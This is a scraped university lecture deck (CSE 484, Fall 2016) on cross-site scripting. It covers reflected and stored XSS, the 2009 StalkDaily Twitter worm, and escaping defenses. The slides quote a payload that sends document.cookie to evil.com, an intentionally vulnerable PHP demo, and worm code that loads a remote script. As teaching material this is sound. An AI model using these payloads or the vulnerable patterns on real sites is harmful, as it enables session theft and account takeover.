administrative
play

Administrative Lab 2 is out please form groups of 1-3 and get to - PowerPoint PPT Presentation

Mar 08, 2023 •441 likes •940 views

CSE 484 / CSE M 584: Computer Security and Privacy XSS attacks Fall 2016 Ada (Adam) Lerner lerner@cs.washington.edu Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell, Vitaly

  1. CSE 484 / CSE M 584: Computer Security and Privacy XSS attacks Fall 2016 Ada (Adam) Lerner lerner@cs.washington.edu Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell, Vitaly Shmatikov, Bennet Yee, and many others for sample slides and materials ...

  2. Administrative • Lab 2 is out – please form groups of 1-3 and get to work, it’s due Nov 21! • Details will be coming in the next couple days on the final project! 11/9/16 CSE 484 / CSE M 584 - Fall 2016 2

  3. http://www.owasp.org OWASP Top 10 Web Vulnerabilities 1. Injection 2. Broken Authentication & Session Management 3. Cross-Site Scripting 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross-Site Request Forgery 9. Using Known Vulnerable Components 10. Unvalidated Redirects and Forwards 11/9/16 CSE 484 / CSE M 584 - Fall 2016 3

  4. CSRF • “Confused Deputy” – the browser acts with Alice’s privileges (cookies) even when directed to make requests by an attacker • Defenses: – Form synchronization tokens – Referer header checking 11/9/16 CSE 484 / CSE M 584 - Fall 2016 4

  5. Cross-Site Scripting (XSS) 11/9/16 CSE 484 / CSE M 584 - Fall 2016 5

  6. XSS • I have a friend with a really hard to pronounce name. Her name is “ <img src=‘ http://upload.wikimedia.org/wikipedia/en/ thumb/3/39/YoshiMarioParty9.png/210px- YoshiMarioParty9.png’>” � 11/9/16 CSE 484 / CSE M 584 - Fall 2016 6

  7. XSS • XSS is about the problems that arise when you have a name that just happens to be a HTML tag 11/9/16 CSE 484 / CSE M 584 - Fall 2016 7

  8. PHP: Hypertext Processor • Server scripting language with C-like syntax 11/9/16 CSE 484 / CSE M 584 - Fall 2016 8

  9. PHP: Hypertext Processor • Can intermingle static HTML and code <input value=<?php echo $myvalue; ?>> 11/9/16 CSE 484 / CSE M 584 - Fall 2016 9

  10. PHP: Hypertext Processor • Can intermingle static HTML and code <input value=<?php echo $myvalue; ?>> • Can embed variables in double-quote strings $user = “ world ” ; echo “ Hello $user! ” ; or $user = “ world ” ; echo “ Hello ” . $user . “ ! ” ; 11/9/16 CSE 484 / CSE M 584 - Fall 2016 10

  11. PHP: Hypertext Processor • Can intermingle static HTML and code <input value=<?php echo $myvalue; ?>> • Can embed variables in double-quote strings $user = “ world ” ; echo “ Hello $user! ” ; or $user = “ world ” ; echo “ Hello ” . $user . “ ! ” ; • Form data in global arrays $_GET, $_POST, … 11/9/16 CSE 484 / CSE M 584 - Fall 2016 11

  12. Echoing / “Reflecting” User Input Classic mistake in server-side applications http://naive.com/search.php?term= “ Justin Bieber ” search.php responds with <html> <html> <title>Search <title>Search results</title> results</title> <body>You <body>You have have searched searched for for <? <?php php echo echo $_GET[term] $_GET[term] ?> ?>… … </body> </body> Or GET/ hello.cgi?name=Bob hello.cgi responds with <html>Welcome, <html>Welcome, dear dear Bob</html> Bob</html> 11/9/16 CSE 484 / CSE M 584 - Fall 2016 12

  13. Echoing / “Reflecting” User Input naive.com/hello.cgi? naive.com/hello.cgi?name= <img src=‘ http://upload.wikimedia.org/wikipedia/en/thumb/3/39/ name= Bob � YoshiMarioParty9.png/210px-YoshiMarioParty9.png’> � Welcome, dear Bob Welcome, dear 11/9/16 CSE 484 / CSE M 584 - Fall 2016 13

  14. Cross-Site Scripting (XSS) naive.com evil.com hello.cgi Access some web page <iframe src= http://naive.com/hello.cgi? GET/ hello.cgi?name= name=<script>win.open( <script>win.open( “ http:// “ http://evil.com/steal.cgi? evil.com/steal.cgi?cookie= ” + hello.cgi cookie= ” +document.cookie) document.cookie)</script> executed </script>> <HTML>Hello, dear <script>win.open( “ http:// Forces victim’s browser to evil.com/steal.cgi?cookie= ” call hello.cgi on naive.com +document.cookie)</script> with this script as “ name ” Welcome!</HTML> GET/ steal.cgi?cookie= Interpreted as JavaScript by victim’s browser; opens window and calls steal.cgi on evil.com victim’s browser 11/9/16 CSE 484 / CSE M 584 - Fall 2016 14

  15. XSS – Quick Demo <?php Need to explicitly disable setcookie("SECRET_COOKIE", "12345"); XSS protection – newer header("X-XSS-Protection: 0"); browsers try to help web developers avoid these ?> vulnerabilities! <html><body><br><br> <form action="vulnerable.php" method="get"> Name: <input type="text" name="name" size="80"> <input type="submit" value="submit”></form> <br><br><br> <div id="greeting"> <?php $name = $_GET["name"]; if($name) { echo "Welcome " . $_GET['name'];} ?> </div></body></html> 11/9/16 CSE 484 / CSE M 584 - Fall 2016 15

  16. Reflected XSS • User is tricked into visiting an honest website – Phishing email, link in a banner ad, comment in a blog • Bug in website code causes it to echo to the user’s browser an arbitrary attack script – The origin of this script is now the website itself! • Script can manipulate website contents (DOM) to show bogus information, request sensitive data, control form fields on this page and linked pages, cause user’s browser to attack other websites – This violates the “ spirit ” of the same origin policy 11/9/16 CSE 484 / CSE M 584 - Fall 2016 16

  17. Basic Pattern for Reflected XSS Attack server e t i s b e w t i s i v 1 receive malicious page a t 2 a d e l b a u l a v d n e s 5 3 click on evil link User victim 4 Server victim echo “user” input 11/9/16 CSE 484 / CSE M 584 - Fall 2016 17

  18. Where Malicious Scripts Lurk • User-created content – Social sites, blogs, forums, wikis • When visitor loads the page, website displays the content and visitor’s browser executes the script – Many sites try to filter out scripts from user content, but this is difficult! 11/9/16 CSE 484 / CSE M 584 - Fall 2016 18

  19. Stored XSS Attack server a t a d e b l a u l a v l a e t s 4 1 Inject malicious 2 request content User victim script 3 receive malicious script Store bad stuff Users view or download content Server victim 11/9/16 CSE 484 / CSE M 584 - Fall 2016 19

  20. Twitter Worm (2009) • Can save URL-encoded data into Twitter profile • Data not escaped when profile is displayed • Result: StalkDaily XSS exploit – If view an infected profile, script infects your own profile var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! "); var xss = urlencode('http://www.stalkdaily.com"></a><script src="http:// mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></ script><a '); var ajaxConn = new XHConn(); ajaxConn.connect( “ /status/update", "POST", "authenticity_token="+authtoken +"&status="+update+"&tab=home&update=update"); ajaxConn1.connect( “ /account/settings", "POST", "authenticity_token="+authtoken +"&user[url]="+xss+"&tab=home&update=update”) http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/ 11/9/16 CSE 484 / CSE M 584 - Fall 2016 20

  21. Q3 naive.com/hello.cgi? naive.com/hello.cgi?name= <img src=‘ http://upload.wikimedia.org/wikipedia/en/thumb/3/39/ name= Bob � YoshiMarioParty9.png/210px-YoshiMarioParty9.png’> � Welcome, dear Bob Welcome, dear 11/9/16 CSE 484 / CSE M 584 - Fall 2016 21

  22. 11/9/16 CSE 484 / CSE M 584 - Fall 2016 22

  23. Defenses: Cross-Site Scripting (XSS) • Any user input and client-side data must be preprocessed before it is used inside HTML • Remove / encode HTML special characters – Use a good escaping library • OWASP ESAPI (Enterprise Security API) • Microsoft’s AntiXSS – In PHP, htmlspecialchars(string) will replace all special characters with their HTML codes • ‘ becomes &#039; “ becomes &quot; & becomes &amp; – In ASP.NET, Server.HtmlEncode(string) 11/9/16 CSE 484 / CSE M 584 - Fall 2016 23

  24. With appropriate defenses naive.com/hello.cgi? naive.com/hello.cgi?name= <img src=‘ http://upload.wikimedia.org/wikipedia/en/thumb/3/39/ name= Bob � YoshiMarioParty9.png/210px-YoshiMarioParty9.png’> � Welcome, dear <img src=‘ � Welcome, dear Bob http://upload.wikimedia.org/ � wikipedia/en/thumb/ � 3/39/YoshiMarioParty9 � .png/210px-YoshiMario � Party9.png’> � 11/9/16 CSE 484 / CSE M 584 - Fall 2016 24

  25. With filters in place • <html>Welcome, <html>Welcome, dear dear Bob</html> Bob</html> • &lt; img src=‘http://upload.wikimedia.org/ wikipedia/en/thumb/3/39/ YoshiMarioParty9.png/210px- YoshiMarioParty9.png’ &gt; 11/9/16 CSE 484 / CSE M 584 - Fall 2016 25

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

What is Administrative Law? Administrative Law is the body of law that governs federal and

What is Administrative Law? Administrative Law is the body of law that governs federal and

A DMINISTRATIVE L AW FOR L EGISLATORS MICHAEL P. MANION Deputy Director &amp; Chief Legal Counsel Department of Administration State of Montana 406-444-3310 mmanion@mt.gov January 2019 What is Administrative Law? Administrative Law is

361 views • 10 slides
ADMINISTRATIVE PANEL ADMINISTRATIVE PANEL Administrative panel is an instrument which helps

ADMINISTRATIVE PANEL ADMINISTRATIVE PANEL Administrative panel is an instrument which helps

ADMINISTRATIVE PANEL ADMINISTRATIVE PANEL Administrative panel is an instrument which helps employees of the company to manage and control SIM cards. The structure is made in such a way that it allows to put important information logically

356 views • 7 slides
Presentation of the OAS Administrative Tribunal before the Committee on Administrative and

Presentation of the OAS Administrative Tribunal before the Committee on Administrative and

Presentation of the OAS Administrative Tribunal before the Committee on Administrative and Budgetary Affairs of the Permanent Council October 10, 2017 1. BACKGROUND OF THE ADMINISTRATIVE TRIBUNAL It is the only tribunal with competence in

370 views • 23 slides
Using Synchronization Using Synchronization Administrative Administrative Lab 2 due Thursday at

Using Synchronization Using Synchronization Administrative Administrative Lab 2 due Thursday at

Using Synchronization Using Synchronization Administrative Administrative Lab 2 due Thursday at midnight. Sign up for demos on the Web; e-mail your writeup to me and your demoee, and cc: all group members. Problem set will be available on the

289 views • 11 slides
EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures

EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures

EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures in Europe Working Group 1 The scope of Administrative Jurisdiction: control of the Administration vs. Substitution Cons. ROSA PERNA Tar del Lazio

763 views • 8 slides
EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures

EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures

EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures in Europe Working Group 1 The scope of Administrative Jurisdiction: control of the Administration vs. Substitution Cons. ROSA PERNA Tar del Lazio

578 views • 13 slides
EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures

EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures

EJTN ADMINISTRATIVE LAW TRAINING Brussels, 9-10 April 2019 Changing Administrative Law Procedures in Europe Working Group 1 The scope of Administrative Jurisdiction: control of the Administration vs. Substitution Cons. ROSA PERNA Tar del Lazio

681 views • 11 slides
The Statistical Administrative Records System and Administrative Records Experiment 2000: System

The Statistical Administrative Records System and Administrative Records Experiment 2000: System

The Statistical Administrative Records System and Administrative Records Experiment 2000: System Design, Successes, and Challenges Dean H. Judson Planning, Research and Evaluation Division U.S. Census Bureau How Administrative Records Are

715 views • 25 slides
Sec 1 Registration Administrative Briefing 2017 Administrative Briefing Documents and

Sec 1 Registration Administrative Briefing 2017 Administrative Briefing Documents and

Sec 1 Registration Administrative Briefing 2017 Administrative Briefing Documents and Information Purchase of textbooks, uniforms and iPads First Week of School Financial Matters Subject-based Banding Foyer Layout PSG Booth

429 views • 25 slides
Counting the Population M More Accurately using A t l i Administrative Data Administrative

Counting the Population M More Accurately using A t l i Administrative Data Administrative

Counting the Population M More Accurately using A t l i Administrative Data Administrative Data Understanding Population Trends and Processes: Building Capacity through User-Academic Collaboration City Hall, London 9 October 2009 9

708 views • 31 slides
The Administrative Conference: Review of Research Projects Emily Bremer, Attorney Advisor

The Administrative Conference: Review of Research Projects Emily Bremer, Attorney Advisor

The Administrative Conference: Review of Research Projects Emily Bremer, Attorney Advisor Administrative Codes and Registers Section 2014 Summer Meeting ADMINISTRATIVE CONFERENCE OF THE UNITED STATES The Administrative Conference is a public

304 views • 14 slides
Firewalls Firewalls October 16, 2020 Administrative Administrative submittal

Firewalls Firewalls October 16, 2020 Administrative Administrative submittal

Firewalls Firewalls October 16, 2020 Administrative Administrative submittal instructions submittal instructions answer the lab assignments questions in written report form, as a text, pdf, or Word document file (no obscure

585 views • 21 slides
What is it? 1 5/13/2019 Reimagining UW- Madisons administrative infrastructure People

What is it? 1 5/13/2019 Reimagining UW- Madisons administrative infrastructure People

5/13/2019 ADMINISTRATIVE TRANSFORMATION PROGRAM What is it? 1 5/13/2019 Reimagining UW- Madisons administrative infrastructure People Process Technology Why? 2 5/13/2019 1 Administrative complexities constrain advancing our

441 views • 13 slides
29 Illinois Administrative Code 301 Updates Currently in Effect 29 Illinois Administrative Code

29 Illinois Administrative Code 301 Updates Currently in Effect 29 Illinois Administrative Code

29 Illinois Administrative Code 301 Updates Currently in Effect 29 Illinois Administrative Code 301 Title 29: Emergency Services, Disasters, and Civil Defense Chapter 1: Emergency Management Agency SubChapter C: Administration and

848 views • 59 slides
AB 32 Administrative Fee AB 32 Administrative Fee Regulation Regulation Concept Workshop

AB 32 Administrative Fee AB 32 Administrative Fee Regulation Regulation Concept Workshop

AB 32 Administrative Fee AB 32 Administrative Fee Regulation Regulation Concept Workshop Concept Workshop Office of Climate Change California Air Resources Board January 27, 2009 Sacramento 1 Outline Outline Outline Overview

284 views • 16 slides
Office of Administrative Hearings Julian Mann, III Director and Chief Administrative Law Judge

Office of Administrative Hearings Julian Mann, III Director and Chief Administrative Law Judge

Office of Administrative Hearings Julian Mann, III Director and Chief Administrative Law Judge Legislative Overview For JOINT APPROPRIATIONS SUBCOMITTEE ON GENERAL GOVERNMENT March 1, 2017 (This page is intentionally left blank) Joint

292 views • 28 slides
The Importance of DNS in Preventing Global Cyber Attacks Ricardo Rodrigues Effective Internet

The Importance of DNS in Preventing Global Cyber Attacks Ricardo Rodrigues Effective Internet

The Importance of DNS in Preventing Global Cyber Attacks Ricardo Rodrigues Effective Internet Security Has Never Been More Important The cost of security incidents has increased, driven by Ransomware $ 20,752 6M 1.6M $8,699 2013 2016

921 views • 32 slides
Generic Related-key Attacks for HMAC Thomas Peyrin, Yu Sasaki and Lei Wang Nanyang Technological

Generic Related-key Attacks for HMAC Thomas Peyrin, Yu Sasaki and Lei Wang Nanyang Technological

Introduction A generic related-key attack on HMAC Conclusion Generic Related-key Attacks for HMAC Thomas Peyrin, Yu Sasaki and Lei Wang Nanyang Technological University - Singapore NTT - Japan Asiacrypt 2012 Beijing, China - December 5, 2012

3.43k views • 42 slides
Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5, 2016 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh What can go bad if a web server is

702 views • 37 slides
Protocol Attacks What is a protocol attack? How does it work? Different types of

Protocol Attacks What is a protocol attack? How does it work? Different types of

Outline : Part 1 Introduction Protocol Attacks What is a protocol attack? How does it work? Different types of protocol attack By Sushant Rewaskar Introduction: Types of attacks What is a protocol attack? Buffer overflow

518 views • 13 slides
ECE590 Computer and Information Security Fall 2018 Denial of Service Attacks Tyler Bletsch

ECE590 Computer and Information Security Fall 2018 Denial of Service Attacks Tyler Bletsch

ECE590 Computer and Information Security Fall 2018 Denial of Service Attacks Tyler Bletsch Duke University Denial-of-Service (DoS) Attack The NIST Computer Security Incident Handling Guide defines a DoS attack as: An action that

565 views • 28 slides
Ransomware Threats to Storage(NAS/SAN/Cloud) and possible mitigation Tuesday, May 23, 2017

Ransomware Threats to Storage(NAS/SAN/Cloud) and possible mitigation Tuesday, May 23, 2017

Ransomware Threats to Storage(NAS/SAN/Cloud) and possible mitigation Tuesday, May 23, 2017 Anupam Jagdish Chomal Tech Lead/Principal Software Engineer DellEMC Isilon 1 Who am I? The Eternal Question Who am I? Principal

636 views • 18 slides
Preventing (Network) Time Travel with Chronos Omer Deutsch, Neta Rozen Schiff , Danny Dolev,

Preventing (Network) Time Travel with Chronos Omer Deutsch, Neta Rozen Schiff , Danny Dolev,

Preventing (Network) Time Travel with Chronos Omer Deutsch, Neta Rozen Schiff , Danny Dolev, Michael Schapira Network Time Protocol (N (NTP) NTP synchronizes time across computer systems over the Internet. Many applications rely on NTP

940 views • 53 slides
Tuple Space Explosion: A Denial-of-Service Attack Against a Software Packet Classifier Levente

Tuple Space Explosion: A Denial-of-Service Attack Against a Software Packet Classifier Levente

Tuple Space Explosion: A Denial-of-Service Attack Against a Software Packet Classifier Levente Csikor, Min Suk Kang, Dinil Mon Divakaran Attila K rsi, Dvid Haja, Balzs Sonkoly, Dimitrios P. Pezaros, Stefan Schmid, Gbor Rtvri

773 views • 31 slides

More recommend